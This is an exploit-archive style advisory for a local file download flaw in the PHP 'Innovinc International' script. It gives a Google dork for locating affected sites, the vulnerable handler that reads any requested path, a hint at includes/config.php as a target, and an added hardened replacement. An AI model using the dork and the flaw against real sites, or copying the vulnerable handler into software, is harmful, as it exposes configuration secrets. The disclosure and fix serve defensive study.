/***********************************************************************************
** Exploit Title: Innovinc International Script Local File Download Vulnerability
**
** Exploit Author: Milad Hacking
**
** Vendor Homepage : https://innovinc.org/
**
** Version : 1.1
**
** Google Dork : inurl:/importantdates intext:"Innovinc International"
**
** Date: 2020-02-13
**
** Tested on: Kali Linux / Iceweasel
**
***********************************************************************************
** Demo :
***********************************************************************************
** Vulnerability code :
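<?php
// 'file' is taken straight from the query string with no validation.
$file = $_GET['file'];
// Any path the web server user can read passes this check,
// for example includes/config.php.
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/pdf');
    // 'newFile' is also request-controlled and is not checked.
    header('Content-Disposition: attachment; filename='.$_GET['newFile']);
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    // The file contents are sent to the client as-is.
    readfile($file);
    exit;
}
?>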
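***********************************************************************************
** Hardened handler (added example, not the vendor's or the exploit author's code) :
** It confines downloads to one directory and refuses everything else. The downloads
** directory, the PDF-only allow-list and the name resolve_download are assumptions.

```php
<?php
// Added example: hardened download.php. DOWNLOAD_DIR and ALLOWED_EXT are
// assumptions, not values taken from the vendor's script.
declare(strict_types=1);

const DOWNLOAD_DIR = __DIR__ . '/downloads';   // assumed: only public files live here
const ALLOWED_EXT  = ['pdf'];                  // assumed: the script only serves PDFs

/**
 * Map a user-supplied name to a real path inside the download directory,
 * or return null when the request must be refused.
 */
function resolve_download(string $requested, string $baseDir = DOWNLOAD_DIR): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses ../ and follows symlinks, so the prefix check
    // below is made against the file that would actually be read.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                           // resolved outside the download directory
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $path : null;
}

$requested = $_GET['file'] ?? '';
$path = is_string($requested) ? resolve_download($requested) : null;
if ($path === null) {
    http_response_code(404);                   // same answer for every refusal
    exit;
}
// The download name comes from the resolved file, never from the request.
header('Content-Type: application/pdf');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
exit;
```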
***********************************************************************************
** Special thanks to: iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Babak Kh4t4R
Mahdi CocAin - Mohammad Samiyi <3
***********************************************************************************